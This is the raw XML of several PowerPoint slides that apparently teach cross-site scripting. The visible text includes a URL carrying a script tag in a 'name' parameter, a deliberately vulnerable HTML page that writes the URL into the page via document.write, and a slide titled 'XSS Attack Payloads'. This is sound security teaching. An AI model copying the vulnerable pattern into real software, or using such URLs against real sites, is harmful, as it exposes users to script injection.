            <a:srgbClr val="DB3D16"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="18288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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>page.htm?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=&lt;script&gt;...&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6288228" y="5446254"/>
            <a:ext cx="636753" cy="636751"/>
            <a:chOff x="3285453" y="1431558"/>
            <a:chExt cx="1465134" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Oval 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3285453" y="1431558"/>
              <a:ext cx="1465134" cy="1465129"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050" cmpd="sng">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19" name="Oval 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3373277" y="1519470"/>
              <a:ext cx="1289487" cy="1289304"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1"/>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0" tIns="0" rIns="0" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
              <a:prstTxWarp prst="textNoShape">
                <a:avLst/>
              </a:prstTxWarp>
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="1580"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>NOT OK</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1813620"/>
            <a:ext cx="8229600" cy="3161122"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;HTML&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  &lt;TITLE&gt;Welcome!&lt;/TITLE&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  Hi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  &lt;SCRIPT&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>pos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.URL.indexOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>("name=")+5; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.URL.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>pos,document.URL.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  &lt;/SCRIPT&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  &lt;BR&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  Welcome to our system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;/HTML&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162932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900" decel="100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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mph" presetSubtype="0" fill="hold" grpId="1" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:animClr clrSpc="hsl" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>stroke.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:by>
                                        <p:hsl h="0" s="12549" l="25098"/>
                                      </p:by>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="30" presetID="10" presetClass="exit" presetSubtype="0" fill="hold" nodeType="with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37"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900" decel="100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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45" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="46" presetID="35" presetClass="emph" presetSubtype="0" repeatCount="3000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:anim calcmode="discrete" valueType="str">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="5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XSS Attack Payloads</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="62" name="Group 61"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="821288" y="837959"/>
            <a:ext cx="7801464" cy="4076408"/>
            <a:chOff x="273395" y="483659"/>
            <a:chExt cx="8648657" cy="4519082"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="34" name="Group 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1193527" y="964750"/>
              <a:ext cx="6690803" cy="4030886"/>
              <a:chOff x="975987" y="1390937"/>
              <a:chExt cx="6690803" cy="4030886"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35" name="TextBox 34"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2222429" y="1390937"/>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6" name="TextBox 35"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5726576" y="1390937"/>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7" name="TextBox 36"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4374304" y="1967091"/>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8" name="TextBox 37"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="975987" y="232103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9" name="TextBox 38"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7219953" y="232103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40" name="TextBox 39"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4835842" y="261499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41" name="TextBox 40"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2986757" y="261499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42" name="TextBox 41"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="975987" y="3499250"/>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3" name="TextBox 42"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3139620" y="3499250"/>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4" name="TextBox 43"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7114122" y="3652108"/>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5" name="TextBox 44"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6696682" y="4171862"/>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6" name="TextBox 45"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4150885" y="4359994"/>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7" name="TextBox 46"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3633493" y="4713937"/>
                <a:ext cx="446837" cy="707886"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="4000" b="1">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:alpha val="20000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>O</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="48" name="Group 47"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="273395" y="483659"/>
              <a:ext cx="8648657" cy="4519082"/>
              <a:chOff x="49975" y="1126475"/>
              <a:chExt cx="8648657" cy="4519082"/>
            </a:xfrm>
            <a:noFill/>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="49" name="Rectangle 48"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3762842" y="3652108"/>
                <a:ext cx="333939" cy="333939"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:grpFill/>
              <a:ln w="38100" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="20000"/>
                  </a:srgb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1">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50" name="Freeform 1"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1252321" y="1126475"/>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Freeform 1"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4821141" y="1126475"/>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Freeform 1"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="49975" y="2143539"/>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Freeform 1"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6293941" y="2143539"/>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Freeform 1"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4303751" y="2719693"/>
                <a:ext cx="1552172" cy="82427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Freeform 1"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2454666" y="2719693"/>
                <a:ext cx="1552172" cy="82427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Freeform 55"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3927466" y="2243509"/>
                <a:ext cx="364526" cy="1446265"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 364526"/>
                  <a:gd name="connsiteY0" fmla="*/ 1446265 h 1446265"/>
                  <a:gd name="connsiteX1" fmla="*/ 235178 w 364526"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 1446265"/>
                  <a:gd name="connsiteX2" fmla="*/ 364526 w 364526"/>
                  <a:gd name="connsiteY2" fmla="*/ 399781 h 1446265"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX0" y="connsiteY0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX1" y="connsiteY1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX2" y="connsiteY2"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="364526" h="1446265">
                    <a:moveTo>
                      <a:pt x="0" y="1446265"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="235178" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="364526" y="399781"/>
                    </a:ln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5797128" y="2490432"/>
                <a:ext cx="1599208" cy="1399232"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 1599208 w 1599208"/>
                  <a:gd name="connsiteY0" fmla="*/ 1399232 h 1399232"/>
                  <a:gd name="connsiteX1" fmla="*/ 0 w 1599208"/>
                  <a:gd name="connsiteY1" fmla="*/ 0 h 1399232"/>
                  <a:gd name="connsiteX2" fmla="*/ 35277 w 1599208"/>
                  <a:gd name="connsiteY2" fmla="*/ 399781 h 1399232"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX0" y="connsiteY0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX1" y="connsiteY1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX2" y="connsiteY2"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1599208" h="1399232">
                    <a:moveTo>
                      <a:pt x="1599208" y="1399232"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35277" y="399781"/>
                    </a:ln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456616" y="4030763"/>
                <a:ext cx="1575690" cy="564396"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 1575690 w 1575690"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 564396"/>
                  <a:gd name="connsiteX1" fmla="*/ 658497 w 1575690"/>
                  <a:gd name="connsiteY1" fmla="*/ 70550 h 564396"/>
                  <a:gd name="connsiteX2" fmla="*/ 258695 w 1575690"/>
                  <a:gd name="connsiteY2" fmla="*/ 235165 h 564396"/>
                  <a:gd name="connsiteX3" fmla="*/ 0 w 1575690"/>
                  <a:gd name="connsiteY3" fmla="*/ 564396 h 564396"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX0" y="connsiteY0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX1" y="connsiteY1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX2" y="connsiteY2"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="connsiteX3" y="connsiteY3"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="1575690" h="564396">
                    <a:moveTo>
                      <a:pt x="1575690" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1226843" y="15678"/>
                      <a:pt x="877996" y="31356"/>
                      <a:pt x="658497" y="70550"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="438998" y="109744"/>
                      <a:pt x="368444" y="152857"/>
                      <a:pt x="258695" y="235165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="148945" y="317473"/>
                      <a:pt x="0" y="564396"/>
                      <a:pt x="0" y="564396"/>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1246442" y="2792065"/>
                <a:ext cx="3739324" cy="968258"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 3739324 w 3739324"/>
                  <a:gd name="connsiteY0" fmla="*/ 15840 h 968258"/>
                  <a:gd name="connsiteX1" fmla="*/ 2375294 w 3739324"/>
                  <a:gd name="connsiteY1" fmla="*/ 15840 h 968258"/>
                  <a:gd name="connsiteX2" fmla="*/ 1058299 w 3739324"/>
                  <a:gd name="connsiteY2" fmla="*/ 180455 h 968258"/>
                  <a:gd name="connsiteX3" fmla="*/ 399802 w 3739324"/>
                  <a:gd name="connsiteY3" fmla="*/ 580236 h 968258"/>
                  <a:gd name="connsiteX4" fmla="*/ 0 w 3739324"/>
                  <a:gd name="connsiteY4" fmla="*/ 968258 h 9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324" h="968258">
                    <a:moveTo>
                      <a:pt x="3739324" y="15840"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="3280727" y="2122"/>
                      <a:pt x="2822131" y="-11596"/>
                      <a:pt x="2375294" y="15840"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1928457" y="43276"/>
                      <a:pt x="1387548" y="86389"/>
                      <a:pt x="1058299" y="180455"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="729050" y="274521"/>
                      <a:pt x="576185" y="448935"/>
                      <a:pt x="399802" y="580236"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="223419" y="711537"/>
                      <a:pt x="0" y="968258"/>
                      <a:pt x="0" y="968258"/>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915707" y="5232422"/>
                <a:ext cx="1528655" cy="413135"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 1528655 w 1528655"/>
                  <a:gd name="connsiteY0" fmla="*/ 223407 h 413135"/>
                  <a:gd name="connsiteX1" fmla="*/ 1246442 w 1528655"/>
                  <a:gd name="connsiteY1" fmla="*/ 352747 h 413135"/>
                  <a:gd name="connsiteX2" fmla="*/ 823122 w 1528655"/>
                  <a:gd name="connsiteY2" fmla="*/ 411539 h 413135"/>
                  <a:gd name="connsiteX3" fmla="*/ 411561 w 1528655"/>
                  <a:gd name="connsiteY3" fmla="*/ 293956 h 413135"/>
                  <a:gd name="connsiteX4" fmla="*/ 82313 w 1528655"/>
                  <a:gd name="connsiteY4" fmla="*/ 94066 h 413135"/>
                  <a:gd name="connsiteX5" fmla="*/ 0 w 1528655"/>
                  <a:gd name="connsiteY5" fmla="*/ 0 h 41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655" h="413135">
                    <a:moveTo>
                      <a:pt x="1528655" y="223407"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1446343" y="272399"/>
                      <a:pt x="1364031" y="321392"/>
                      <a:pt x="1246442" y="352747"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1128853" y="384102"/>
                      <a:pt x="962269" y="421338"/>
                      <a:pt x="823122" y="411539"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="683975" y="401741"/>
                      <a:pt x="535029" y="346868"/>
                      <a:pt x="411561" y="293956"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="288093" y="241044"/>
                      <a:pt x="150906" y="143059"/>
                      <a:pt x="82313" y="94066"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13719" y="45073"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>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949499" y="1585047"/>
                <a:ext cx="1058299" cy="2845497"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 1058299 w 1058299"/>
                  <a:gd name="connsiteY0" fmla="*/ 0 h 2845497"/>
